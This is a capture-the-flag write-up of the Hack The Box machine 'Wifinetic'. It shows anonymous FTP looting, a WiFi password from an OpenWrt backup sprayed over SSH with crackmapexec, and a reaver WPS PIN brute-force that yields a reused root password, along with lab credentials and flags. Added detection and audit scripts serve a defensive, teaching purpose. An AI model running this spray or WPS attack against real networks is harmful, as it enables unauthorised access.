Nmap Scan

As always, let’s start with a basic port scan:

# Nmap 7.94 scan initiated Sat Sep 16 14:10:16 2023 as: nmap -sC -sV -oA nmap/wifinetic --min-rate=10000 10.10.11.247
Nmap scan report for 10.10.11.247
Host is up (0.089s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.19
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt
| -rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf
| -rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf
| -rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdf
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
53/tcp open tcpwrapped
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 16 14:10:29 2023 -- 1 IP address (1 host up) scanned in 12.56 seconds

We have three open ports: FTP on port 21, SSH on port 22, and DNS on port 53 (reported only as tcpwrapped).

FTP

From the Nmap scan, we can see we have anonymous login allowed via FTP, so let’s poke at that:

~/HTB/wu/Wifinetic ❯ ftp 10.10.11.247
Connected to 10.10.11.247.
220 (vsFTPd 3.0.3)
Name (10.10.11.247:ahmed): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||45061|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt
-rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf
-rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf
-rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdf
226 Directory send OK.

We can download each file to our local machine and take a look at it, but I prefer to use wget to download all of them recursively. I will use the following command to do that:

wget -r ftp://10.10.11.247

Now, wget will connect to the FTP server and download all the files:

...
FINISHED --2023-09-17 12:04:14--
Total wall clock time: 18s
Downloaded: 5 files, 2.5M in 13s (200 KB/s)

Upon completion, a directory named after the machine’s IP address is created, housing all the files:

~/HTB/wu/Wifinetic ❯ ls -lah 10.10.11.247                                                              
total 2.6M
drwxr-xr-x 2 ahmed ahmed 4.0K Sep 17 12:04 .
drwxr-xr-x 3 ahmed ahmed 4.0K Sep 17 12:03 ..
-rw-r--r-- 1 ahmed ahmed 40K Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
-rw-r--r-- 1 ahmed ahmed 52K Jul 31 11:03 employees_wellness.pdf
-rw-r--r-- 1 ahmed ahmed 4.4K Jul 31 11:03 MigrateOpenWrt.txt
-rw-r--r-- 1 ahmed ahmed 2.4M Jul 31 11:03 ProjectGreatMigration.pdf
-rw-r--r-- 1 ahmed ahmed 60K Jul 31 11:03 ProjectOpenWRT.pdf

The primary point of interest within the text and PDF files is two usernames, potentially useful for a subsequent password spray:

olivia.walker17
samantha.wood93

The remaining file to inspect is the OpenWrt backup tar file. I will extract it using the following command:

~/HTB/wu/Wifinetic/ftp ❯ tar xvf backup-OpenWrt-2023-07-26.tar   
./etc/
./etc/config/
./etc/config/system
./etc/config/wireless
./etc/config/firewall
./etc/config/network
./etc/config/uhttpd
./etc/config/dropbear
./etc/config/ucitrack
./etc/config/rpcd
./etc/config/dhcp
./etc/config/luci
./etc/uhttpd.key
./etc/uhttpd.crt
./etc/sysctl.conf
./etc/inittab
./etc/group
./etc/opkg/
./etc/opkg/keys/
./etc/opkg/keys/4d017e6f1ed5d616
./etc/hosts
./etc/passwd
./etc/shinit
./etc/rc.local
./etc/dropbear/
./etc/dropbear/dropbear_ed25519_host_key
./etc/dropbear/dropbear_rsa_host_key
./etc/shells
./etc/profile
./etc/nftables.d/
./etc/nftables.d/10-custom-filter-chains.nft
./etc/nftables.d/README
./etc/luci-uploads/
./etc/luci-uploads/.placeholder

The extraction yields an ‘etc’ directory containing several intriguing files. A quick online search reveals that OpenWrt config files are typically located in /etc/config/:

~/HTB/wu/Wifinetic/ftp/etc/config ❯ ls
dhcp dropbear firewall luci network rpcd system ucitrack uhttpd wireless

Looking through them, the wireless config (/etc/config/wireless) contains this key:

config wifi-iface 'wifinet0'
option device 'radio0'
option mode 'ap'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
option wps_pushbutton '1'

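The backup is in OpenWrt's UCI format, and a defender reviewing such a backup before it ends up on a shared FTP directory would want to parse it and flag exactly the settings seen above: a plaintext PSK, WPA1-style 'psk' encryption, and WPS push-button enabled. The following is an added example written for this write-up, not code from the original post or from OpenWrt; the sample config is constructed (placeholder keys), and the option names are the real ones OpenWrt uses in /etc/config/wireless.

```python
"""Audit an OpenWrt UCI wireless config for risky access-point settings.

Added example (not from the original write-up): a minimal parser for the
UCI syntax of /etc/config/wireless plus checks a defender would run over a
router backup before it is stored anywhere reachable.
"""
import shlex

# Constructed sample in UCI syntax; structure mirrors the wifi-iface block in
# the backup, but every value here is an invented placeholder.
SAMPLE_WIRELESS = """
config wifi-device 'radio0'
    option type 'mac80211'
    option channel '1'

config wifi-iface 'wifinet0'
    option device 'radio0'
    option mode 'ap'
    option ssid 'OpenWrt'
    option encryption 'psk'
    option key 'EXAMPLE-PSK-PLACEHOLDER'
    option wps_pushbutton '1'

config wifi-iface 'wifinet1'
    option device 'radio0'
    option mode 'ap'
    option ssid 'Guest'
    option encryption 'sae'
    option key 'EXAMPLE-SAE-PLACEHOLDER'
    option wps_pushbutton '0'
"""

# Encryption values that are WEP, open, or WPA1/TKIP-capable.
WEAK_ENCRYPTION = {"none", "wep", "wep-open", "wep-shared", "psk", "psk-mixed", "psk+tkip"}


def parse_uci(text):
    """Parse UCI text into a list of sections.

    Each section is {'type', 'name', 'options'}; 'list' entries are collected
    into Python lists. Values are shell-quoted, so shlex handles the quoting.
    """
    sections = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)
        keyword = tokens[0]
        if keyword == "config":
            name = tokens[2] if len(tokens) > 2 else None
            sections.append({"type": tokens[1], "name": name, "options": {}})
        elif keyword == "option" and sections:
            sections[-1]["options"][tokens[1]] = tokens[2] if len(tokens) > 2 else ""
        elif keyword == "list" and sections:
            sections[-1]["options"].setdefault(tokens[1], []).append(tokens[2])
    return sections


def audit_wireless(text):
    """Return (section_name, finding) tuples for every risky wifi-iface."""
    findings = []
    for sec in parse_uci(text):
        if sec["type"] != "wifi-iface":
            continue
        opts = sec["options"]
        name = sec["name"] or "<anonymous>"
        enc = opts.get("encryption", "none")
        if enc in WEAK_ENCRYPTION or enc.startswith("wep"):
            findings.append((name, f"weak encryption mode '{enc}'"))
        if opts.get("wps_pushbutton") == "1":
            findings.append((name, "WPS push-button enabled; WPS PIN recovery becomes possible"))
        if "key" in opts and opts.get("mode") == "ap":
            findings.append((name, "plaintext PSK in config; treat a leaked backup as a credential leak"))
    return findings


if __name__ == "__main__":
    for section, finding in audit_wireless(SAMPLE_WIRELESS):
        print(f"[{section}] {finding}")
```

The interesting part for this box is the third check: every PSK-protected AP necessarily keeps its key in the config, so a readable backup is a password disclosure, and the rest of the write-up shows why that matters when the same password is reused elsewhere.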
It looks like this is the WiFi password. I’ll try spraying it against the previously acquired usernames plus the netadmin user from the backup’s passwd file. I made a usernames.txt file containing the three usernames:

~/HTB/wu/Wifinetic ❯ cat usernames.txt     
olivia.walker17
samantha.wood93
netadmin

Now we can use crackmapexec to spray the password against the SSH server, since that is the only service we can authenticate to:

~/HTB/wu/Wifinetic ❯ cme ssh 10.10.11.247 -u usernames.txt -p 'VeRyUniUqWiFIPasswrd1!'
SSH 10.10.11.247 22 10.10.11.247 [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9
SSH 10.10.11.247 22 10.10.11.247 [-] olivia.walker17:VeRyUniUqWiFIPasswrd1! Authentication failed.
SSH 10.10.11.247 22 10.10.11.247 [-] samantha.wood93:VeRyUniUqWiFIPasswrd1! Authentication failed.
SSH 10.10.11.247 22 10.10.11.247 [+] netadmin:VeRyUniUqWiFIPasswrd1! - shell access!

The results confirm that the netadmin user can access the shell using the identified password.

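On the receiving side, a spray like the one above leaves a recognisable trace in the sshd log: one source address failing against several distinct usernames in a short window, then succeeding. The following detector is an added example written for this write-up, not code from the original post; the log lines are constructed to resemble Ubuntu's syslog-style sshd messages, the year is supplied because syslog omits it, and the window and user-count thresholds are assumptions a deployer would tune.

```python
"""Detect SSH password spraying in sshd auth logs.

Added example (not part of the original write-up). Groups sshd password
events by source address, flags a source that failed against several
distinct accounts within a window (the shape of a one-password-many-users
spray, as opposed to a brute force on a single account), and separately
reports a success from the same source after failures.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines in Ubuntu's syslog sshd format (not real log data).
SAMPLE_LOG = """\
Sep 17 11:20:01 wifinetic sshd[2101]: Failed password for invalid user olivia.walker17 from 10.10.14.19 port 40010 ssh2
Sep 17 11:20:02 wifinetic sshd[2103]: Failed password for invalid user samantha.wood93 from 10.10.14.19 port 40012 ssh2
Sep 17 11:20:03 wifinetic sshd[2105]: Failed password for invalid user backup from 10.10.14.19 port 40014 ssh2
Sep 17 11:20:04 wifinetic sshd[2107]: Accepted password for netadmin from 10.10.14.19 port 40016 ssh2
Sep 17 11:20:05 wifinetic sshd[2107]: pam_unix(sshd:session): session opened for user netadmin by (uid=0)
Sep 17 11:25:40 wifinetic sshd[2150]: Failed password for netadmin from 10.10.14.50 port 51000 ssh2
Sep 17 11:25:45 wifinetic sshd[2151]: Failed password for netadmin from 10.10.14.50 port 51001 ssh2
Sep 17 11:25:50 wifinetic sshd[2152]: Failed password for netadmin from 10.10.14.50 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_events(text, year=2023):
    """Return (timestamp, result, user, ip) for each sshd password event.

    The year is an assumption: syslog timestamps do not carry one.
    Lines that are not password events (e.g. pam_unix session lines) are skipped.
    """
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_spray(events, window=timedelta(minutes=10), min_users=3):
    """Return alerts as (ip, kind, users).

    kind is 'password-spray' when one source failed against >= min_users
    distinct accounts inside `window`, and 'success-after-failures' when a
    source that had failures later authenticated successfully.
    """
    alerts = []
    by_ip = defaultdict(list)
    for ts, result, user, ip in events:
        by_ip[ip].append((ts, result, user))
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [(ts, user) for ts, result, user in evs if result == "Failed"]
        # Sliding window over failures: count distinct usernames inside it.
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            users = {u for _, u in fails[start:end + 1]}
            if len(users) >= min_users:
                alerts.append((ip, "password-spray", sorted(users)))
                break
        successes = {user for _, result, user in evs if result == "Accepted"}
        if successes and fails:
            alerts.append((ip, "success-after-failures", sorted(successes)))
    return alerts


if __name__ == "__main__":
    for ip, kind, users in detect_spray(parse_events(SAMPLE_LOG)):
        print(f"{ip}: {kind} -> {', '.join(users)}")
```

The distinct-user count is what separates the spray from the second source in the sample, which hammers a single account and would be caught by an ordinary per-account lockout rule instead; the success-after-failures alert is the one worth paging on, since it is the moment the reused password actually worked.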
Shell

~/HTB/wu/Wifinetic ❯ ssh netadmin@10.10.11.247
netadmin@10.10.11.247's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun 17 Sep 2023 11:21:12 AM UTC

System load: 0.02
Usage of /: 64.2% of 4.76GB
Memory usage: 6%
Swap usage: 0%
Processes: 222
Users logged in: 0
IPv4 address for eth0: 10.10.11.247
IPv6 address for eth0: dead:beef::250:56ff:feb9:3ba3
IPv4 address for wlan0: 192.168.1.1
IPv4 address for wlan1: 192.168.1.23

* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.

https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Sep 17 11:21:04 2023 from 10.10.14.19
netadmin@wifinetic:~$

We can get the user flag:

netadmin@wifinetic:~$ ls
user.txt
netadmin@wifinetic:~$ cat user.txt
af074d87ad615b046a44d840727b3487

Privesc

The first thing I always try after getting a shell is sudo -l, to see which commands I can run with sudo without a password. In this case our user can’t run sudo at all, as shown below:

netadmin@wifinetic:~$ sudo -l
[sudo] password for netadmin:
Sorry, user netadmin may not run sudo on wifinetic.

We can look for setuid binaries and other basic misconfigurations since this is an easy machine, or run linpeas and let it do its thing. Eventually we find an interesting capability using this command:

getcap -r / 2>/dev/null

This command recursively lists every file with file capabilities set, starting from the root directory, while suppressing permission-denied errors:

netadmin@wifinetic:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+ep

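Reviewing getcap output by eye works on a five-line listing, but on a fleet a defender would compare it against a baseline and tag the capabilities that matter. The script below is an added example written for this write-up, not code from the original post or from libcap; it parses both the older `path = caps` form shown above and the `path caps` form printed by newer libcap releases. The baseline of expected entries is an assumption for a stock Ubuntu 20.04 host, and the python3.8 line in the sample is constructed to show a high-risk hit.

```python
"""Audit getcap output against a baseline of expected file capabilities.

Added example (not from the original write-up): parses `getcap -r /`
output, reports binaries whose capability set is not in an expected
baseline, and tags the ones carrying capabilities that by themselves let a
local user change identity, bypass file permissions or inspect processes.
"""
import re

# First five lines reuse the listing from the write-up; the python3.8 line is
# constructed to show the newer 'path caps=flags' format and a high-risk hit.
SAMPLE_GETCAP = """\
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+ep
/usr/bin/python3.8 cap_setuid=ep
"""

# Expected path -> capability set on a stock host (assumption for this example).
BASELINE = {
    "/usr/bin/ping": {"cap_net_raw"},
    "/usr/bin/mtr-packet": {"cap_net_raw"},
    "/usr/bin/traceroute6.iputils": {"cap_net_raw"},
}

# Capabilities that alone give a local user a direct path to root-equivalent access.
HIGH_RISK = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner",
}

# Accepts "path = caps+flags" (older libcap) and "path caps=flags" (newer libcap).
GETCAP_RE = re.compile(r"^(?P<path>\S+)(?: = | )(?P<caps>\S+)$")


def parse_getcap(text):
    """Return {path: set(capability names)} from getcap output."""
    result = {}
    for line in text.splitlines():
        m = GETCAP_RE.match(line.strip())
        if not m:
            continue
        # Drop the flag suffix ('+ep' or '=ep'), then split the comma list.
        caps = re.split(r"[+=]", m["caps"])[0]
        result[m["path"]] = {c for c in caps.split(",") if c}
    return result


def audit_caps(text, baseline=BASELINE):
    """Return (path, sorted caps, severity) for each entry not matching the baseline."""
    findings = []
    for path, caps in parse_getcap(text).items():
        if baseline.get(path) == caps:
            continue
        severity = "high" if caps & HIGH_RISK else "review"
        findings.append((path, sorted(caps), severity))
    return findings


if __name__ == "__main__":
    for path, caps, severity in audit_caps(SAMPLE_GETCAP):
        print(f"{severity:6} {path} {','.join(caps)}")
```

On this box the audit would surface reaver as an unexpected cap_net_raw binary in review, which is the right level: cap_net_raw is not root-equivalent by itself, but an attack tool carrying it on a host that also runs a WiFi AP is the combination that matters, and the baseline comparison is what makes it stand out among the legitimate ping-style entries.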
We have a binary called reaver. A quick search shows it is a tool that brute-forces Wi-Fi Protected Setup (WPS) PINs to recover WPA/WPA2 passphrases, and the cap_net_raw capability is what lets it send and capture raw frames on a wireless interface without being root. So how can we abuse this?
If we run the binary with no arguments, it prints the help menu, including a usage example:

Example:
/usr/bin/reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv

We need two pieces of information: the monitor-mode interface and the BSSID. To get both we can run iwconfig:

netadmin@wifinetic:~$ iwconfig 
wlan2 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on

wlan1 IEEE 802.11 ESSID:"OpenWrt"
Mode:Managed Frequency:2.412 GHz Access Point: 02:00:00:00:00:00
Bit Rate:5.5 Mb/s Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
Link Quality=70/70 Signal level=-30 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:9 Missed beacon:0

eth0 no wireless extensions.

hwsim0 no wireless extensions.

mon0 IEEE 802.11 Mode:Monitor Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on

lo no wireless extensions.

wlan0 IEEE 802.11 Mode:Master Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on

That gives us the monitor-mode interface, mon0, and the BSSID of the OpenWrt access point, 02:00:00:00:00:00. Now we just need to run reaver with those arguments:

netadmin@wifinetic:~$ /usr/bin/reaver -i mon0 -b 02:00:00:00:00:00 -vv

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 02:00:00:00:00:00
[+] Switching mon0 to channel 1
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 1 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'
[+] Nothing done, nothing to save.

Within a second, reaver recovered the WPA PSK: WhatIsRealAnDWhAtIsNot51121!.
Since the earlier WiFi password was also reused for the netadmin SSH account, it is worth trying this one for root with su:

netadmin@wifinetic:~$ su root
Password:
root@wifinetic:/home/netadmin# cat /root/root.txt
49e918ab2bd90752f62db31a05cc6a97

This indeed worked, and we have a shell as root.
That was the box. Thank you for reading; I hope you learned something :)